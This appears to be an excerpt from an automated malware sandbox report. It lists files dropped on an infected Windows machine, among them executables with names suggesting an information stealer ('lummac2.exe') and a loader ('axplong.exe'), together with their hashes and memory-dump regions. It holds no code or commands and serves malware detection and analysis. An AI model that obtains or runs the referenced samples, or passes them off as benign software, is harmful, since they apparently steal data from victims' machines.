badcf60a46d44a57683c77eeb413830fd1991c813e59e28ff4589c90261717c197de5a4ec1ffec5088d4aa693aa23f7acba7b1addded0726807dd7a9807548ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8976035b7275ad1a062ed93b2ccaa466

SHA1
52849a2e3f077e76e91d42070716ec1e27b7582f

SHA256
9df9503ca700a6a4f2fd7a69a3933860fff1ec2afedcc7ff31dd984d304e5e21

SHA512
a09b6f55fed9855ec274eecce36249cf50286db5be442432bb9cb36e096c3189873e5e60f6e45567cade4602958ba463605b01131be4e361d9aafdf252262b87

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
426c36d3e2798b41cf5228350fd22419

SHA1
d4a1267e94766d6c39662d5417fc1e7680de12df

SHA256
35e0940c12cb30578405e68ebd2dd8767daa7ff0084cf3462e204254d90cb250

SHA512
045d11fcfe30ea337696dca3b6e92e27608bf51731869af1cda21b4fa43401404bfd7553b731e54b7eca5f3b030b34dc0337c043fae9e8dafd6c1fa1f884a631

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
af2c09b52bdbd5295281cb8ddf91f64b

SHA1
661204522a99fd310d09cfac1a05cd27ef790026

SHA256
6a08a11002f617ef3f65565df150675e9529bad36e47cd30c414c17740daec3c

SHA512
05ee25820b9579f762526e1fa3d9e32e37d726f9296db0f2781379b29ad571b0d86451ab2d5155103c985f875c4194665e8e6a144f28dc47be475b7180a09346

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
892735200cf632f605cfb65fffb0cb74

SHA1
ce06c8447b90ab433a0be8d715f658c5db180e0f

SHA256
480a489037cb878c6c57c54e65f2f8225d6d9cc2cee966a0a11e730e3cf2654b

SHA512
50703c4681203452cb0e6be7b6dce41988fad58b69435065217a372e29c8683f29d9e6a7fd7624421ccf9cefcd55710574adcc046fc7f0c20ab00ad9bcdf502d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\jw2rl61\imagestore.dat

Filesize
2KB

MD5
07874e1a509580e6e3bd9fc99582df77

SHA1
dca855387819ee02c35c686c1af0b154c8898b60

SHA256
abca99fff6630580246b2b06966cc012f7f254a8ee723be23ea139240ce88e9a

SHA512
337241431698d71bb359dfaec529f6e99b07e34552c918c1217b86f57ecdbfab8ab74b01862031070f874d39f1caad3f2df892bbbbfa2e043ee5e26965f89c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\favicon[1].png

Filesize
2KB

MD5
18c023bc439b446f91bf942270882422

SHA1
768d59e3085976dba252232a65a4af562675f782

SHA256
e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482

SHA512
a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe

Filesize
297KB

MD5
5d860e52bfa60fec84b6a46661b45246

SHA1
1259e9f868d0d80ac09aadb9387662347cd4bd68

SHA256
b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30

SHA512
04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe

Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe

Filesize
522KB

MD5
70a578f7f58456e475facd69469cf20a

SHA1
83e147e7ba01fa074b2f046b65978f838f7b1e8e

SHA256
5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a

SHA512
707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe

Filesize
310KB

MD5
6e3d83935c7a0810f75dfa9badc3f199

SHA1
9f7d7c0ea662bcdca9b0cda928dc339f06ef0730

SHA256
dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed

SHA512
9f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe

Filesize
415KB

MD5
07101cac5b9477ba636cd8ca7b9932cb

SHA1
59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1

SHA256
488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77

SHA512
02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe

Filesize
659KB

MD5
bbd06263062b2c536b5caacdd5f81b76

SHA1
c38352c1c08fb0fa5e67a079998ef30ebc962089

SHA256
1875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9

SHA512
7faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe

Filesize
5.8MB

MD5
6c149b39619395a8ba117a4cae95ba6f

SHA1
3ef8be98589745ecce5522dd871e813f69a7b71b

SHA256
c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8

SHA512
866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe

Filesize
1.8MB

MD5
44d2d87fccae6236b0ca82141e169a23

SHA1
c88549c6a8506daa9f493870cc943e37eabe0cac

SHA256
85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41

SHA512
faaa6cf93e8940c08b06feda89646e6c40bf9a5811c2af7d2f466d57fd62c430700c2c54a7fd8a4e9a826299fef0633213d1d4a8e3ad9b395812c865d3403bf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar48CA.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\Users\Admin\AppData\Local\Temp\6.exe

Filesize
4.8MB

MD5
5bb3677a298d7977d73c2d47b805b9c3

SHA1
91933eb9b40281e59dd7e73d8b7dac77c5e42798

SHA256
85eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f

SHA512
d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d

Download Submit
memory/1184-955-0x0000000019F70000-0x000000001A252000-memory.dmp

Filesize
2.9MB

Download
memory/1184-956-0x00000000012C0000-0x00000000012C8000-memory.dmp

Filesize
32KB

Download
memory/1512-924-0x000000013FD60000-0x0000000140396000-memory.dmp

Filesize
6.2MB

Download
memory/1728-2-0x0000000000AF1000-0x0000000000B1F000-memory.dmp

Filesize
184KB

Download
memory/1728-3-0x0000000000AF0000-0x0000000000F93000-memory.dmp

Filesize
4.6MB

Download
memory/1728-0-0x0000000000AF0000-0x0000000000F93000-memory.dmp

Filesize
4.6MB

Download
memory/1728-5-0x0000000000AF0000-0x0000000000F93000-memory.dmp

Filesize
4.6MB

Download
memory/1728-16-0x0000000006A60000-0x0000000006F03000-memory.dmp

Filesize
4.6MB

Download
memory/1728-1-0x00000000774F0000-0x00000000774F2000-memory.dmp

Filesize
8KB

Download
memory/1728-15-0x0000000000AF0000-0x0000000000F93000-memory.dmp

Filesize
4.6MB

Download
memory/1748-50-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/1784-958-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1784-964-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1784-960-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1784-957-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1784-962-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1784-959-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2516-975-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-977-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-978-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-976-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-1209-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-1194-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-974-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-967-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-973-0x0000000000200000-0x0000000000220000-memory.dmp

Filesize
128KB

Download
memory/2516-972-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-970-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-968-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-966-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-971-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2516-969-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2576-948-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2576-949-0x0000000001E30000-0x0000000001E38000-memory.dmp

Filesize
32KB

Download
memory/2616-36-0x0000000000140000-0x0000000000190000-memory.dmp

Filesize
320KB

Download
memory/2676-284-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2676-285-0x0000000000930000-0x000000000114E000-memory.dmp

Filesize
8.1MB

Download
memory/2676-282-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2676-280-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2980-462-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-376-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-377-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-979-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-908-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-925-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-269-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-941-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-942-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-101-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-943-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-21-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-19-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-18-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-17-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1528-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1529-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1530-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1531-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1532-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download
memory/2980-1533-0x0000000000A10000-0x0000000000EB3000-memory.dmp

Filesize
4.6MB

Download